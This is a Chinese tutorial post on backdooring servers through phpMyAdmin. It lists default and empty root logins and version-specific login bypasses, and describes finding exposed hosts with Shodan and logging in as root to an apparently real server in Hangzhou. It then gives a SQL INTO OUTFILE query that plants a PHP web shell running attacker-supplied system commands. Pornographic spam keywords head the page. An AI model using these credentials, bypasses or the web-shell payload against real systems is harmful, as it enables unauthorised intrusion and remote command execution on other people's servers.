欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

phpMyAdmin通過密碼漏洞留后門文件

 更新時間:2018年11月20日 09:51:28   作者:吃面包的科學怪人  
今天小編就為大家分享一篇關于phpMyAdmin通過密碼漏洞留后門文件,小編覺得內容挺不錯的,現在分享給大家,具有很好的參考價值,需要的朋友一起跟隨小編來看看吧
  • 默認 phpMyAdmin:用戶名 root 密碼 root 或空登陸。
  • 版本 2.11.3~2.11.4:用戶名 'localhost'@'@" 登陸,無需密碼。
  • 版本 2.11.9.2:用戶名 root 登陸,無需密碼。

經測試,第二個漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理從略。

下面讓我們簡單的上網看看能不能找到一些存在這樣漏洞的登陸頁面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

先看看有沒有不需要密碼登陸的,逐一嘗試沒有后尋找名字中包含的版本號。這里我找到一個國內的(浙江省·杭州市)。

地址已手動打碼。

http://121.***.*.219:80/

登陸成功(root 權限)。

接下來你可以寫一個 outfile 到對方主機的網絡目錄下。俗稱 “留后門”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后門文件的絕對路徑"

點擊運行,不出意外便在對方主機留下了一個名為 runme.php 的后門文件。

總結

以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作具有一定的參考學習價值,謝謝大家對腳本之家的支持。如果你想了解更多相關內容請查看下面相關鏈接

相關文章

最新評論